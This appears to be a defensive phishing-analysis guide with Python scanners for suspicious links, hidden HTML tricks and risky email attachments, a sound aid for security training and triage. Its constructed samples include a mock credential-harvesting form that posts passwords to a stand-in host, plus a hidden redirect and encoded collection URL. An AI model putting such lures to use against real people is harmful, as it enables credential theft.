The purpose of this phase is to critically inspect the contents of the message or phishing asset (email, SMS, voicemail transcript, social media message, or webpage) for:
Signs of social engineering
Technical indicators of compromise (IOCs)
Malicious intent, such as credential theft or malware delivery
At this phase, analysts connect context to motive: beyond how a message was sent, they investigate why it was sent and what it wants the target to do.
Message Analysis (Social Engineering Detection)
Analyze both written language and visual structure; compare suspicious emails to known-good examples from the same organization or platform (if possible). Search for:
Spelling/Grammar - Errors, non-native syntax, typos, inconsistent capitalization
Formatting - Misaligned elements, odd font choices, broken layout, wrong date/time zone
Generic Greetings - “Dear Customer,” “Hello user,” or no greeting
Awkward Phrasing - Phrases like “kindly do the needful” or “your services will expire before 24hrs”
Logo/Brand Abuse - Poorly rendered logos, outdated branding, low-res images
Imitation Attempts - Signature blocks that impersonate trusted entities but are off slightly (wrong titles, domains, or contact info)
Search the content for psychological manipulation (pressure to act without thinking): urgency, fear, authority, scarcity, curiosity, and greed.
Technical Indicators of Compromise (IOCs)
URLs and hyperlinks are the core payload of most phishing attempts, so attackers obfuscate URLs, hide malicious domains behind redirects, or use deceptive look-alike domains. Search for:
Hover over the link (do not click); is the display text different from the actual URL?
Are shortened URLs (e.g., bit.ly, tinyurl) used?
Are there embedded login forms or tracking links?
Are domains misspelled or unusual - typosquatting or homographs?
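The four link checks above can be run mechanically over the HTML of a suspect message. The following is an added example written for this checklist, not code from the original guide; the allow-list, the shortener list and the sample message are constructed, and the anchor extractor assumes double-quoted href attributes (use a full HTML parser for production triage):

```python
import re
from urllib.parse import urlparse

# Constructed allow-list: domains the organisation legitimately links to (assumption).
KNOWN_GOOD = {"example.com", "example.org"}

# Common URL shorteners; a partial list, extend it from your own intel (assumption).
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "ow.ly", "is.gd", "cutt.ly"}

# Minimal anchor extractor: captures the href value and the visible link text.
ANCHOR_RE = re.compile(r'<a\s+[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
# Something in the display text that looks like a URL or a bare domain.
DISPLAY_HOST_RE = re.compile(r'(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})', re.I)


def registrable(host: str) -> str:
    """Crude registrable domain (last two labels); use a public-suffix list in production."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot typosquats of allow-listed domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def analyze_links(html: str) -> list:
    """Return one record per <a> element with the checks it tripped."""
    results = []
    for href, raw_text in ANCHOR_RE.findall(html):
        text = re.sub(r"<[^>]+>", "", raw_text).strip()
        host = (urlparse(href).hostname or "").lower()
        flags = []

        # 1. Display text shows one domain while the href goes somewhere else.
        m = DISPLAY_HOST_RE.search(text)
        if m and registrable(m.group(1)) != registrable(host):
            flags.append("display_mismatch")
        # 2. A shortener hides the real destination.
        if host in SHORTENERS:
            flags.append("shortener")
        # 3. Punycode or non-ASCII label: possible IDN homograph.
        if "xn--" in host or not host.isascii():
            flags.append("punycode")
        # 4. One or two edits away from a trusted domain: likely typosquat.
        dom = registrable(host)
        if dom not in KNOWN_GOOD and any(edit_distance(dom, g) <= 2 for g in KNOWN_GOOD):
            flags.append("lookalike")

        results.append({"text": text, "href": href, "flags": flags})
    return results


# Constructed sample message body; the domains are placeholders, not real targets.
SAMPLE_HTML = """
<p>Your mailbox is almost full. <a href="http://bit.ly/3abcDEF">Upgrade now</a></p>
<p>Sign in at <a href="https://examp1e.com/login">https://example.com/login</a></p>
<p>Help: <a href="https://xn--exmple-xta.com/help">Support portal</a></p>
<p>Policy: <a href="https://example.com/policy">https://example.com/policy</a></p>
"""

if __name__ == "__main__":
    for r in analyze_links(SAMPLE_HTML):
        print(f"{r['href']:<40} {r['text']!r:<32} {r['flags'] or 'ok'}")
```

The display-versus-href comparison is the automated equivalent of hovering over the link; the edit-distance check only catches single-character swaps against your own allow-list, so pair it with a homograph-aware library when you have one.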
Email and web-based attacks often obfuscate or hide code to mask their intent. Analysts should search for:
Base64 or Quoted-Printable Encoding - hides payloads in attachments or HTML
Hidden Form Fields - collects data without user consent
JavaScript - redirects, keyloggers, form submissions to external domains
Embedded IFrames - load external pages or phishing forms silently
Tracking Pixels - invisible images used to track if a user opened the message
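The five hiding techniques listed above can be surfaced with a single pass over the message HTML. The scanner below is an added example for this guide, not code from the original page; it uses only the Python standard library, and the sender domain, the `.invalid` host names and the sample HTML are constructed for the demonstration:

```python
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# A run of base64 alphabet characters long enough to be a payload rather than a word.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Script fragments that redirect, capture keystrokes, or auto-submit forms.
SCRIPT_RE = re.compile(
    r"window\.location|document\.location|\.submit\(|onkey(?:down|press|up)|addEventListener\(['\"]key",
    re.I,
)


class PhishHtmlScanner(HTMLParser):
    """Collect (kind, detail) findings while walking the HTML."""

    def __init__(self, sender_domain: str):
        super().__init__()
        self.sender_domain = sender_domain.lower()
        self.findings = []
        self._in_script = False

    def _external(self, url: str) -> bool:
        """True when the URL points outside the claimed sender's domain."""
        host = (urlparse(url).hostname or "").lower()
        return bool(host) and not host.endswith(self.sender_domain)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "hidden":
            self.findings.append(("hidden_field", a.get("name", "?")))
        elif tag == "form" and self._external(a.get("action", "")):
            self.findings.append(("external_form", a["action"]))
        elif tag == "iframe":
            self.findings.append(("iframe", a.get("src", "")))
        elif tag == "img":
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width", "") in ("0", "1") and a.get("height", "") in ("0", "1")
            if tiny or "display:none" in style or "visibility:hidden" in style:
                self.findings.append(("tracking_pixel", a.get("src", "")))
        elif tag == "script":
            self._in_script = True
            if self._external(a.get("src", "")):
                self.findings.append(("external_script", a["src"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here as raw text because HTMLParser treats them as CDATA.
        if self._in_script and SCRIPT_RE.search(data):
            self.findings.append(("script_redirect_or_capture", data.strip()[:60]))
        # Long base64 runs in visible or hidden text: decode and keep printable results.
        for blob in B64_RE.findall(data):
            try:
                decoded = base64.b64decode(blob, validate=True).decode("ascii")
            except (binascii.Error, UnicodeDecodeError):
                continue
            if decoded.isprintable():
                self.findings.append(("base64_blob", decoded[:60]))


def scan_html(html: str, sender_domain: str) -> list:
    """Run the scanner and return its findings as a list of (kind, detail)."""
    p = PhishHtmlScanner(sender_domain)
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample: the blob is built here so the example is self-contained.
HIDDEN_PAYLOAD = base64.b64encode(b"redirect=http://login-portal.invalid/collect").decode()
SAMPLE_HTML = f"""
<html><body>
<p>Dear Customer, your account will be suspended within 24hrs.</p>
<form action="https://login-portal.invalid/submit" method="post">
  <input type="hidden" name="campaign" value="q3-wave2">
  <input type="text" name="username"> <input type="password" name="password">
  <input type="submit" value="Verify">
</form>
<iframe src="https://login-portal.invalid/frame" width="0" height="0"></iframe>
<img src="https://login-portal.invalid/open.gif?id=42" width="1" height="1">
<script>setTimeout(function(){{ window.location = 'https://login-portal.invalid/'; }}, 3000);</script>
<p style="display:none">{HIDDEN_PAYLOAD}</p>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML, "example.com"):
        print(f"{kind:<28} {detail}")
```

Hidden inputs and 1x1 images also appear in legitimate marketing mail, so treat each finding as a weight in the overall verdict rather than a standalone conviction; the external form action and the decoded blob pointing at a domain unrelated to the sender are the stronger signals here.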
Attachments are mainly associated with email; attackers use them to steal sensitive data, launch a second attack stage, or gain remote access to the host. Search for:
Does the filename align with the message content?
Is the extension suspicious (.exe, .vbs, .js, .iso, .hta, .xlsm, etc.)?
Is there a lure message urging you to open it?
Does it ask you to “Enable Macros” or “Click to View”?
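The attachment questions above (extension, filename versus content, and lure wording such as "Enable Macros") can be answered from the raw message without opening anything. The triage routine below is an added example, not code from the original guide; it relies on Python's `email` and `zipfile` modules, extends the page's extension list with a few other well-known executable and macro types, and builds its own constructed sample message (the "PE" and "PDF" attachments are header stubs, and the `vbaProject.bin` entry is a placeholder, not real VBA):

```python
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from pathlib import PurePosixPath

# Extensions from the checklist plus other commonly abused executable/macro types.
RISKY_EXT = {".exe", ".vbs", ".js", ".iso", ".hta", ".xlsm", ".docm", ".scr", ".lnk", ".jse", ".wsf"}
# File signatures ("magic bytes") for the formats this example recognises.
MAGIC = {
    b"MZ": "PE executable",
    b"%PDF": "PDF",
    b"PK\x03\x04": "ZIP/OOXML",
    b"\xd0\xcf\x11\xe0": "OLE2 (legacy Office)",
}
# What the extension claims the bytes should look like.
EXPECTED = {".pdf": "PDF", ".exe": "PE executable", ".scr": "PE executable",
            ".docx": "ZIP/OOXML", ".docm": "ZIP/OOXML", ".xlsx": "ZIP/OOXML", ".xlsm": "ZIP/OOXML",
            ".doc": "OLE2 (legacy Office)", ".xls": "OLE2 (legacy Office)"}
# Lure phrases that push the recipient to open or unlock the attachment.
LURE_RE = re.compile(r"enable (?:macros|content|editing)|click to view|open immediately", re.I)


def check_attachment(filename: str, data: bytes) -> list:
    """Return (kind, detail) flags for one attachment's name and decoded bytes."""
    flags = []
    suffixes = PurePosixPath(filename.lower()).suffixes
    ext = suffixes[-1] if suffixes else ""
    if ext in RISKY_EXT:
        flags.append(("risky_extension", ext))
    if len(suffixes) >= 2:  # e.g. invoice.pdf.exe
        flags.append(("double_extension", "".join(suffixes)))
    detected = next((label for sig, label in MAGIC.items() if data.startswith(sig)), "unknown")
    if ext in EXPECTED and detected != EXPECTED[ext]:
        flags.append(("content_mismatch", f"{ext} but bytes look like {detected}"))
    if detected == "ZIP/OOXML":
        try:
            names = zipfile.ZipFile(io.BytesIO(data)).namelist()
            if any(n.endswith("vbaProject.bin") for n in names):
                flags.append(("macro_enabled", "vbaProject.bin present"))
        except zipfile.BadZipFile:
            flags.append(("content_mismatch", "ZIP header but archive is corrupt"))
    return flags


def triage_message(raw: bytes):
    """Parse a raw RFC 5322 message; return ({filename: flags}, [lure phrases])."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    body = msg.get_body(preferencelist=("plain",))
    text = str(msg["Subject"] or "") + "\n" + (body.get_content() if body else "")
    lures = [m.lower() for m in LURE_RE.findall(text)]
    report = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "<unnamed>"
        report[name] = check_attachment(name, part.get_payload(decode=True) or b"")
    return report, lures


def _macro_xlsm() -> bytes:
    """Constructed OOXML-shaped zip with a vbaProject.bin stub (not real VBA)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/vbaProject.bin", b"stub")
    return buf.getvalue()


def build_sample() -> bytes:
    """Constructed lure e-mail carrying four attachments of varying risk."""
    msg = EmailMessage()
    msg["From"] = "billing@example.com"
    msg["To"] = "finance@example.org"
    msg["Subject"] = "Overdue invoice - open immediately"
    msg.set_content("Please see the attached invoice. Enable macros to view the statement.")
    pe_stub = b"MZ\x90\x00" + b"\x00" * 60  # PE header prefix only, not a program
    msg.add_attachment(pe_stub, maintype="application", subtype="octet-stream", filename="Invoice_2024.pdf.exe")
    msg.add_attachment(_macro_xlsm(), maintype="application", subtype="vnd.ms-excel.sheet.macroEnabled.12", filename="Statement.xlsm")
    msg.add_attachment(pe_stub, maintype="application", subtype="pdf", filename="Receipt.pdf")
    msg.add_attachment(b"%PDF-1.4\n%constructed stub\n", maintype="application", subtype="pdf", filename="Terms.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    report, lures = triage_message(build_sample())
    print("lure phrases:", lures)
    for name, flags in report.items():
        print(f"{name:<24} {flags or 'ok'}")
```

`Receipt.pdf` is the case the checklist's "does the filename align with the content" question is aimed at: the name and MIME type say PDF, but the decoded bytes carry a PE header. Nothing here executes or renders the attachment; detonation still belongs in a sandbox.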
Text-based messages (SMS, social media) can follow the same content analysis as emails, web pages, or URLs. Voice (vishing) analysis instead reviews the following:
Is the tone threatening or overly helpful?
Does the caller request sensitive info?
Is the callback number consistent with the supposed organization?
For suspicious URLs, hyperlinks, payloads, websites, or attachments, only execute or access them within a secure, isolated sandbox.